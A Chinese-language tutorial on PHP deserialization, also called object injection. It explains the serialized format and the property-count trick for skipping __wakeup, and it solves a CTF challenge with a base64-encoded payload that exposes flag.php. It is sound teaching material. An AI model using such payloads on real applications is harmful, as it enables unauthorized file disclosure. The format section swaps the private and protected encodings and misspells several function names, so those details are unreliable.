介绍序列化和反序列化
序列化和反序列化:大型网站中类创建的对象多的时候会占用大量空间,序列化就是将这些对象转换为字符串来保存,当用到的时候再转换为对象,由字符串重新转换为对象的时候用到的就是反序列化。
例:
$a = new A();
$se_a = serialize($a);
echo $se_a;
?>
输出结果:O:1:"A":1:{s:1:"a";i:1;}
格式说明:O:“类的名字的字节数“:“类的名字“:“对象中几个参数“:{“第一个参数名字的类型“:“第一个参数名字所占字节数”:“第一个参数名字”;“第二个参数名字的类型“:“第二个参数名字所占字节数”:“第二个参数名字”;········;“第n个参数名字的类型“:“第n个参数名字所占字节数”:“第n个参数名字”;}
以下以类的名字为“A”,参数名字为a举例子:
若参数类型为public,则参数名字的类型用字母 “s”表示,整体表示为:(s:1:"a";);
若参数类型为private,则参数名字的类型用字母“s”表示,整体表示为:(s:4:"\0*\0a";);
若参数类型为protected,则参数名字的类型用字母“S”表示,整体表示为:(S:2:"\0Aa\0";),参数前面加类的名字。(\0是表示0的ASCII码)
常见的表示类型的字符:
O:类
a:数组(array)
b:boolean
i:整型
s:字符串
N:NULL
d:double,浮点型
挖掘反序列化漏洞需要注意的常用魔法函数
反序列化漏洞也被成为对象注入。
__construct():当一个对象创建时被调用。
__destruct():当一个对象销毁时或者php代码执行完毕时被调用。
__toString():当一个对象被当作一个字符串使用
__sleep():在对象在被序列化之前运行
__wakeup():将在序列化之后立即被调用
__weakup()函数绕过方法:
用上面的例子,正常输出O:1:"A":1:{s:1:"a";i:1;},这里变量数量只有一个,若改成变量数量为两个则可以绕过__weakup函数。
O:1:"A":2:{s:1:"a";i:1;}
原因是php底层代码bug:简单来说,如果对象属性检查异常,那么Purrase_nested_data()将会返回0,且不调用WAKEUP()方法,但是在这之前对象和它的属性已经被创建,紧接着对象将被破坏,从而执行DESTRUCT()函数,于是导致了漏洞。
实战一道CTF题
class SoFun{
protected $file='index.php';
function __destruct(){ //定义析构函数,当创建的对象被销毁时自动执行
if(!empty($this->file)) {
if(strchr($this-> file,"\\")===false && strchr($this->file, '/')===false)
show_source(dirname (__FILE__).'/'.$this ->file);
else die('Wrong filename.');
}}
function __wakeup(){ $this-> file='index.php'; }
public function __toString(){return '' ;}}
if (!isset($_GET['file'])){ show_source('index.php'); }
else{
$file=base64_decode( $_GET['file']);
echo unserialize($file ); }
?> #
这题最后输出答案的语句应该是析构函数里的这句:show_source(dirname (__FILE__).'/'.$this ->file);
可是代码最后执行反序列化的时候执行了__weakup()函数,所以就执行了__weakup()函数中的this->file='index',代码执行结束的时候,析构函数中show_source(dirname (__FILE__).'/'.$this ->file);就输出的为index..php的代码了。所以用绕过__weakup()函数的方法来不让this->file这个变量变成index.php。
1、代码审计
审计代码,可以发现要得到KEY,思路如下:
1、源码最后提示,KEY在flag.php里面;
2、注意到__destruct魔术方法中,有这么一段代码,将file文件内容显示出来
show_source(dirname(FILE).’/‘.$this->file),这个是解题关键;
3、若POST“file”参数为序列化对象,且将file设为flag.php;那么可以通过unserialize反序列化,进而调用__destruct魔术方法来显示flag.php源码(要注意的是file参数内容需要经过base64编码);
4、上面的分析是多么美好,但从代码分析可以知道,还有__wakeup这个拦路虎,通过unserialize反序列化之后,也会调用__wakeup方法,它会把file设为index.php;
5、总结下来就是,想办法把file设为flag.php,调用__destruct方法,且绕过__wakeup。
2、PHP反序列化对象注入漏洞
上网查资料,发现原来这个CTF题目是根据PHP反序列化对象注入漏洞改编的。
简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。举个栗子,比如有个Student类,里面有个参数为name。
实际情况:O:7:”Student”:1:{S:4:”name”;s:8:”zhangsan”;}
Payload:O:7:”Student”:2:{S:4:”name”;s:8:”zhangsan”;}Payload对象属性个数为2,而实际属性个数为1,那么就会掉入漏洞,从而跳过wakeup()方法。
3、CTF Payload
明确了这些之后,就可以构造出Payload了,需反序列化的对象为:
O:5:”SoFun”:2:{S:7:”\00*\00file”;s:8:”flag.php”;}
O:5:”SoFun” 指的是 类:5个字符:SoFun
:2: 指的是 有两个对象
S:7:”\00*\00file” 指的是有个属性,有7个字符,名为\00*\00file
s:8:”flag.php” 指的是属性值,有8个字符,值为flag.php
值得注意的是,file是protected属性,因此需要用\00*\00来表示,\00代表ascii为0的值。另外,还需要经过Base64编码,结果为:
Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==